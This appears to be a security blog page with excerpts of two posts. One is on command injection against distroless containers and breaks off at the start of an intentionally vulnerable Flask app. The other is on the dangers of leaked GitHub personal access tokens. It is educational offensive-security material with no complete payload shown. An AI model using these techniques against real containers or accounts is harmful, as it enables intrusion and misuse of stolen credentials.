echo "0xHat Security"

 As mentioned in Github, "Distroless" images contain only your application and its runtime dependencies. They do not contain package managers, shells or any other programs you would expect to find in a standard Linux distribution." (https://github.com/GoogleContainerTools/distroless) There are multiple reasons why distroless images are getting popular minimal size  does not include excessive binaries ( there is only sh and bash in /bin folder ) more secured ( due to presence of less binaries ) However there has been a wrong perceptions ( as per few blog posts ) that we cannot do command injection attacks in the containers made of distroless images. While this is partly true that we cannot try the usual attacks of command injection but it will be wrong to say that it is impossible. This blog post is about attacking them.  Here is my base code and the Dockerfile app.py from flask import Flask,request import os import subprocess app = Flask(__name__) @app.route("/&q

We have seen scenarios and real world impacts of secrets / api keys in public version control systems like github , gitlab. They have contributed to serious breaches, leaked personal information and so on. The risks of a leaked token is already serious but it is even worse incase it is a Github Personal Access Token. I will demonstrate in this post about the impacts of a leaked github personal access token.  As leaked Github Personal Access Tokens are on rise in public repos in github, this post is to educate about the threats and risks it poses if they are leaked.  Personal access tokens are an alternative to using passwords for authentication via commandline or github API. Github personal access tokens are popularly found in configuration files where a developer may need to clone some private repositories. Private repositories are not visible to users who don't have right authorization to view. Take for example this url https://github.com/hellctflife/myapp . It will throw a 404.